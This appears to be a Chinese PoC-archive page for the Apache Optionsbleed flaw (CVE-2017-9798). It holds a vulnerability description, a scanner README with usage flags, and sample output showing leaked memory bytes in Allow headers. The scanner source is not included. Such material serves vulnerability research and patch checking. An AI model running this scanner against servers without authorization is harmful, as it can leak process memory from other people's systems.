关联漏洞
标题:
Apache HTTP Server 资源管理错误漏洞
(CVE-2017-9798)
描述:Apache HTTP Server是美国阿帕奇(Apache)软件基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点。 Apache HTTP Server 2.2.34及之前的版本和2.4.x版本至2.4.27版本中存在双重释放漏洞。攻击者可通过发送未经身份验证的OPTIONS HTTP请求利用该漏洞读取进程内存中的数据。
描述
OptionsBleed (CVE-2017-9798) PoC / Scanner
介绍
# OptionsBleed-POC-Scanner
OptionsBleed (CVE-2017-9798) PoC / Scanner
More information coming soon...
## Disclaimer
This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.
## Usage
`pip install -r requirements.txt`
```
usage: bleeder.py [-h] [-c COUNT] [-f {option,custom}] [-tc THREAD_COUNT] [-nv] [-ni] [-v] [-e] url
positional arguments:
url full URL (including http(s)) to be scanned
optional arguments:
-h, --help show this help message and exit
-c COUNT, --count COUNT
number of times to scan (default: 1000)
-f {option,custom}, --force {option,custom}
forces the scan to attempt using custom verb method
OR OPTIONS (default: try OPTIONS THEN custom)
-tc THREAD_COUNT, --thread-count THREAD_COUNT
max concurrent thread count (default: 500)
-nv, --no-verify does not verify ssl connection (may be necessary for
self-signed certs)
-ni, --no-ignore does NOT ignore ssl warnings (default: ignored)
-v, --verbose prints all headers
-e, --errors prints all errors
```
## Simple Usage
```console
python bleeder.py "http://10.1.2.3" -c 50
::OptionsBleed (CVE-2017-9798) Scanner::
[+] scanning http://10.1.2.3 to see if it bleeds!
[+] checking OPTION method
[+] allow headers detected in OPTION response
[+] checking CUSTOM method
[+] allow headers detected in CUSTOM response
[+] scanning with OPTIONS method...
[+] scanning with custom (PULL) method...
[+] 50 responses captured
[+] unique results:
GET,HEAD,allow,HEAD,allow,HEAD,,HEAD,OPTIONS,POST,all,HEAD,
GET,HEAD,allow,HEAD,,HEAD,OPTIONS,POST,all,HEAD,
GET,HEAD,╚jφHU,HEAD,,HEAD,,HEAD,,HEAD,,HEAD,,HEAD,OPTIONS,POST,all,HEAD,,HEAD,,,
GET,HEAD,allow,HEAD,allow,HEAD,,HEAD,OPTIONS,POST,all,HEAD,all,HEAD,
GET,HEAD,allow,HEAD,OPTIONS,POST,all,HEAD,all,HEAD
GET,HEAD,allow,HEAD,╚jφHU,HEAD,,HEAD,,HEAD,OPTIONS,POST,,HEAD,all,HEAD,,HEAD,
GET,HEAD,allow,HEAD,OPTIONS,POST,all,HEAD
GET,HEAD,allow,HEAD,,HEAD,OPTIONS,POST,all,HEAD,all,HEAD,
GET,HEAD,allow,HEAD,allow,HEAD,OPTIONS,POST,all,HEAD
GET,HEAD,allow,HEAD,╚jφHU,HEAD,,HEAD,,HEAD,,HEAD,,HEAD,,HEAD,OPTIONS,POST,all,HEAD,,HEAD,,,
GET,HEAD,╚jφHU,HEAD,,HEAD,,HEAD,,HEAD,,HEAD,,HEAD,,HEAD,OPTIONS,POST,all,HEAD,,HEAD,,,
GET,HEAD,allow,HEAD,allow,HEAD,╚jφHU,HEAD,,HEAD,,HEAD,OPTIONS,POST,,HEAD,all,HEAD,,HEAD,
[+] scan complete!
```
文件快照
[4.0K] /data/pocs/0b653157ac9542953820a1d50a1c0f64c5f61dc2
├── [4.5K] bleeder.py
├── [1.0K] LICENSE
├── [2.7K] README.md
└── [ 17] requirements.txt
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。